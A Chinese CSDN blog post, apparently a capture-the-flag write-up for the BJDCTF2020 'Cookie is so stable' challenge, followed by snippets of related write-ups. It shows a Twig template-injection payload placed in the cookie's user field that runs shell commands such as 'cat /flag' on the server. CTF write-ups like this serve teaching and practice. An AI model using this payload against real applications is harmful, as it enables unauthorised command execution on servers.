[BJDCTF2020]Cookie is so stable

最新推荐文章于 2024-06-13 07:36:50 发布
最新推荐文章于 2024-06-13 07:36:50 发布
阅读量1.3k 收藏 1
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107716005
版权

题目
图片.png
过程
1.Flag和Hint两个页面抓包,flag页面告诉我们要先登录,hint页面告诉我们要在cookie里面做文章
图片.png
图片.png
2.flag页面先登录然后抓包,发现cookie里面出现user。尝试多次后,发现是ssti注入
图片.png
图片.png
3.打入payload。
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
图片.png
图片.png

浩歌已行
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 332
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
BJDCTF-2020-Web-Cookie is so subtle!(ssti模板注入+cookie处注入)
weixin_45844670的博客
09-24 582
既然提示了是和cookie有关系 那么先看cookie 没什么东西 然后去flag界面查看一下 发现多了一个user参数 这里存在注入 考虑可能是SSTI注入 尝试一下 123{{9+9}} 确实可以 存在twig模板注入 payload {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 参考链接:https://www.k0rz3n.com/2018/11/12/%E4
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 476
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
[BJDCTF2020]Cookie is so stable 1
weixin_44477223的博客
04-13 1329
运用的知识点 SSTI注入 题目 解题 一开始看到题目提示cookie 先抓一个包试试 没发现什么问题,点开另一个网页 感觉是注入的题目,但是sql注入没啥反应。但是你输入什么他就会回显什么 联想到SSTI注入,构造PL进行尝试: 发现确实能够利用SSTI 判断是twig,构造PL:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 发现不是在这里绕过,我们抓取一个登录的包
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 525
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
获取cookie非常好用的google插件
06-10
标题中的“获取cookie非常好用的google插件”指的是在Google Chrome浏览器上的一种扩展程序,它允许用户方便地管理和操作浏览器中的Cookie数据。Cookie是网站在用户计算机上存储的小型文本文件,用于跟踪用户偏好、...
IIS实现反向代理时Cookie域的设置方法
01-03
反向代理 神马是反向代理?指以代理服务器来接受Internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给Internet上请求连接的客户端,此时代理...但是在多站点共享cookie时会存在
20210820cookie万能获取助手.rar
08-21
标题中的“20210820cookie万能获取助手.rar”暗示这是一款在2021年8月20日发布的工具,主要用于获取Web应用程序的Cookie信息。Cookie是Web服务器存储在用户浏览器上的一小段数据,用于跟踪用户状态、个性化设置以及...
详解jQuery的Cookie插件
11-26
jQuery的Cookie插件是用于管理和操作浏览器Cookie的一种轻量级解决方案。主要由jQuery库扩展的$.cookie()函数实现。在JavaScript中,原生并不提供方便的API来处理Cookie,而jQuery.Cookie.js插件则简化了这一过程。 ...
认识并了解Cookie
04-03
### 认识并深入了解Cookie #### 一、什么是Cookie? **定义:** Cookie是一种由服务器发送给客户端(通常是浏览器)的特殊信息,这些信息以文本文件的形式存储在客户端的计算机上。每当客户端向服务器发送请求时,...
EditThisCookie1.6.3.crx
02-14
方式1. 直接安装EditThisCookie1.6.3.crx设置浏览器cookie; !! 如果1.方式不好用使用方式2 方式2.解压zip文件->chrome选择开发者模式->加载已解压的压缩程序->选择对应的压缩文件目录
cookie实现自动登入
10-10
在互联网应用中,实现用户自动登录功能通常会利用Cookie这一技术。Cookie是由服务器发送到用户的浏览器并存储在本地的一小块数据,它包含了用户的一些关键信息,如用户名、登录状态等,以便下次用户访问时,服务器能...
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
记录学习,一起进步
04-03 729
[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 873
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
cookie is nil
最新发布
07-27
当你在编程中遇到 "cookie is nil" 的情况,通常意味着某个变量 `cookie` 被设置成了 `null` 或者空值,在许多编程语言中,包括JavaScript,它是一个表示未初始化、不存在或者已被删除的对象引用。当尝试访问这样一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值